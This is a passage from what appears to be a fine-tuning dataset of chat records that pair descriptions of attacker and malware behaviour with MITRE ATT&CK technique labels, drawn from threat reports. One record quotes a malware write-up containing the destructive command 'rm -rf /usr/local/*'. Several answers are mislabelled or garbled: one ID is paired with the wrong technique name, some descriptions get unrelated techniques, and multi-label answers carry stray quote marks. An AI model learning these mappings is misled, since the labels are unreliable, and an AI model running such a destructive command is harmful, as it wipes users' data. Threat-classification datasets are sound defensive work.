- "content": "It uses virtualization software – QEMU on macOS and VirtualBox on Windows – to mine cryptocurrency on a Tiny Core Linux virtual machine, making it cross platform. The admins of the site also frequently update the applications with newer versions, making it difficult to track the very first version of the miner. 2) Shell scripts used to launch the QEMU images. qemuservice shell script . After the dependencies are copied over, all miner-related daemons are launched and then the actual software is installed: - qemuservice won’t launch the image if the Activity Monitor process is running. In fact, if it is running, it will unload the plist that it was launched by. Before installation, version 1 of the miner is removed along with executing the command: rm -rf /usr/local/* . As seen in the listing in Script 2, it only does so when it detects a running qemu-system-x86_64 process. Launching the Linux image . All versions use multiple shell scripts to launch the images. Version 1 executes the following binaries (copies of qemu-system-x86_64) to launch the QEMU images: qemu-system-x86_64, system-monitor, tools-service. All versions use the following switches: - -M accel=hvf to use the Hypervisor framework as an accelerator. There are, however, some hints that can help you to identify when an application contains unwanted code: - A trust popup from an unexpected, “additional” installer (in this case the Oracle network adapter). - High CPU consumption by a process you did not install (QEMU or VirtualBox in this case). - A new service added to the startup services list (Windows) or a new Launch Daemon (macOS). - Network connections to curious domain names (such as system-update[.]info or system-check[.]services here). Indicators of Compromise (IoCs) . Hashes . macOS “cracked” applications (versions 1-3) . Windows “cracked” applications (version 4) . Linux images . Filenames . macOS . Windows . Hostnames . Download hosts (via HTTP on port 80) . Update hosts (via SCP) . Mining hosts . MITRE ATT&CK techniques . 20 Jun 2019 - 11:00AM . Sign up to receive an email update whenever a new article is published in our Ukraine Crisis – Digital Security Resource Center . Newsletter . Similar Articles . ESET Research . Watering hole deploys new macOS malware, DazzleSpy, in Asia . Virus Bulletin: Old malware never dies – it just gets more targeted . Anatomy of native IIS malware . Some URL shortener services distribute Android malware, including banking or SMS trojans . Discussion"
- },
- {
- "role": "assistant",
- "content": "T1569.001 - System Services: Launchctl"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke's miner has created UPX-packed files in the Windows Start Menu Folder."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ADVSTORESHELL can create a remote shell and run a given command."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "installs itself as a new service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used a valid account to maintain persistence via scheduled task."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 created a RAR archive of targeted files for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLATINUM is capable of using Windows hook interfaces for information gathering such as credential access."
- },
- {
- "role": "assistant",
- "content": "T1056.004 - Input Capture: Credential API Hooking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is controlled via commands that are appended to image files."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This is performed by checking if the following libraries are loaded on the victim machine.SbieDll.dll (sandboxie library)Dbghelp.dll (Microsoft debugging tools)Api_log.dll (threatAnalyzer / GFI SandBox)Dir_watch.dll (threatAnalyzer / GFI SandBox)We were able to uncover some other techniques used by this variant of ROKRAT to make analysis difficult, Group 123 used an anti-debugging technique related to NOP (No Operation).nop dword ptr [eax+eax+00h] is a 5 byte NOP"
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT has been delivered via spearphishing emails that contain a malicious Hangul Office or Microsoft Word document."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Janicab used a cron job for persistence on Mac devices."
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From September to December 2018 the RTM group sent out more than 11,000 malicious emails. The cybercriminals, however, are not going to stop there, as evidenced by the new malicious campaigns that we track as part of our ongoing threat intelligence activities. Where do we begin our search. Let's start with simple things: we will take the NTUSER.DAT registry file with the latest modification date from the user directory (C:\\Users\\%username%\\), and extract data from it using RegRipper. In general, you do not have to stick to the Sleuth Kit at all; there are more convenient tools like FTK Imager, a free tool, which can be used not only to create forensic images, but also to examine their contents. Let's take a closer look at apg.exe and use PPEE: This looks like TeamViewer and is signed as TeamViewer, so does this mean it indeed is TeamViewer. Judging by the file's size, it has nothing to do with the original msi.dll, so it is clearly DLL Search Order Hijacking. The operating system starts searching for the necessary libraries from the current directory, which means that instead of the legitimate msi.dll, the one located in b7mg81 will be loaded. Another interesting file is TeamViewer.ini: Here is anti-forensics: according to the configuration file, our \"TeamViewer\" did not keep any logs, and was apparently used as a RAT (Remote Access Trojan). Well, not bad. I think what we can use the Sleuth Kit again"
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxxZ has collected the host name and operating system product name from a compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has used cmd.exe likely as a password changing mechanism."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound used FireMalv, custom-developed malware, which collected passwords from the Firefox browser storage."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used AdFind to enumerate remote systems."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, and in the Program Files directory."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "injects into the Internet Explorer process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a batch file to kill a security program task and then attempts to remove itself."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence has weaponized CHM files in their phishing campaigns."
- },
- {
- "role": "assistant",
- "content": "T1218.001 - Signed Binary Proxy Execution: Compiled HTML File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains UAC bypass code for both 32- and 64-bit systems."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT can capture passwords from common chat applications such as MSN Messenger, AOL, Instant Messenger, and and Google Talk."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can capture session logon details from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has downloaded additional scripts and files from adversary-controlled servers. has also used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7."
- },
- {
- "role": "assistant",
- "content": "T1546.012 - Event Triggered Execution: Image File Execution Options Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To establish persistence, Truvasys adds a Registry Run key with a value \"TaskMgr\" in an attempt to masquerade as the legitimate Windows Task Manager."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ConnectWise can record video on remote hosts."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This excellent whitepaper by William Ballenthin, Matt Graeber and Claudiu Teodorescu contains additional information on WMI offense, defense and forensics"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used multiple command-line utilities to enumerate running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dipsind encrypts C2 data with AES256 in ECB mode."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Impacket modules like ntlmrelayx and smbrelayx can be used in conjunction with Network Sniffing and LLMNR/NBT-NS Poisoning and SMB Relay to gather NetNTLM credentials for Brute Force or relay attacks that can gain code execution."
- },
- {
- "role": "assistant",
- "content": "T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We did not observe the initial access for this case but assess with medium to high confidence that a malicious email campaign was used to deliver an Excel (xls) document. Following the opening of the xls document, the initial Qbot DLL loader was downloaded and saved to disk. Interestingly, the name of the DLL contained a .html extension to disguise the portable executable nature of the payload. Once executed, the Qbot process creates a scheduled task to elevate itself to system."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1204.002 - User Execution: Malicious File', 'T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has delivered spearphishing emails with malicious attachments to targets."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 have enumerated files and directories, or searched in specific locations within a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE stages the output from command execution and collected files in specific folders before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack used hard-coded credentials to gain access to a network share."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "surveys a system upon check-in to discover remote systems on a local network using the net view and net view /DOMAIN commands."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has registered and operated domains for campaigns, often using a security or web technology theme or impersonating the targeted organization."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "maintains access to victim environments by using to access as well as establishing a backup RDP tunnel by using ."
- },
- {
- "role": "assistant",
- "content": "T1108 - Redundant Access"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TAINTEDSCRIBE can execute \"GetLocalTime\" for time discovery."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to obtain a listing of running processes (including loaded modules)."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has used PowerSploit's Invoke-Kerberoast module to request encrypted service tickets and bruteforce the passwords of Windows service accounts offline."
- },
- {
- "role": "assistant",
- "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has attempted to map to C$ on enumerated hosts to test the scope of their current credentials/context."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Windows can add a service named \"wind0ws\" to the Registry to achieve persistence after reboot."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The screenshot above shows an abbreviated view of the in-memory PowerShell backdoor. The PowerShell backdoor has the following capabilities"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery', 'T1518 - Software Discovery', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole has a command to list account information on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM has used a fronted domain to obfuscate its hard-coded C2 server domain."
- },
- {
- "role": "assistant",
- "content": "T1090.004 - Domain Fronting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can retrieve files."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Create a Safe Array and copy the decrypted FoggyWeb backdoor bytes to the array. It then calls the Load() function for the current application domain to load the FoggyWeb DLL into the application domain. After the FoggyWeb DLL is loaded into the current application domain, the loader invokes the following method from the DLL: Microsoft.IdentityServer.WebExtension.WebHost. Create a Safe Array and copy the decrypted FoggyWeb backdoor bytes to the array. It then calls the Load() function for the current application domain to load the FoggyWeb DLL into the application domain. After the FoggyWeb DLL is loaded into the current application domain, the loader invokes the following method from the DLL: Microsoft.IdentityServer.WebExtension.WebHost"
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperBro has the ability to start and stop a specified service."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As with other adversaries that mine cryptocurrency opportunistically, Blue Mockingbird likes to move laterally and distribute mining payloads across an enterprise"
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been known to brute force password hashes to be able to leverage plain text credentials."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains the execFile function to execute a specified file on the system using the NSTask:launch method."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has disguised an MSI file as the Adobe Acrobat Reader Installer and has masqueraded payloads as OneDrive, WhatsApp, or Spotify, for example."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has copied itself to and infected removable drives for propagation."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon execution, HyperStack undergoes a similar registry key check to Turla’s RPC backdoor and updates the same registry key to determine which named pipes can be accessed anonymously. The HyperStack backdoor first copies itself to C:\\ADSchemeIntegrity.exe and then installs itself with system-level privileges as the service Active Directory Scheme Integrity Service. HyperStack checks for the following registry entry and, when found, adds the name of its communication pipe (‘adschemerpc’) to the key value"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent can use a decryption algorithm for strings based on Rotate on Right (RoR) and Rotate on Left (RoL) functionality."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In previous attacks, we were able to determine the impacted organization based on the domain names and credentials used by the Disttrack tool to spread to other systems on the network. However, that functionality was missing from this sample. Unlike past Shamoon attacks, this particular Disttrack wiper would not overwrite files with an image. Instead it would overwrite the MBR, partitions, and files on the system with randomly generated data"
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This document likely marks the first observed use of this technique by APT28. The use of DDE with PowerShell allows an attacker to execute arbitrary code on a victim’s system regardless whether macros are enabled"
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Penquin has mimicked the Cron binary to hide itself on compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak has a command to create a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On March 5, 2020, researcher Steven Seeley, published an advisory and released proof-of-concept code for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 (CVE-2020-10189). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload “logger.zip”, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can browse directories on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
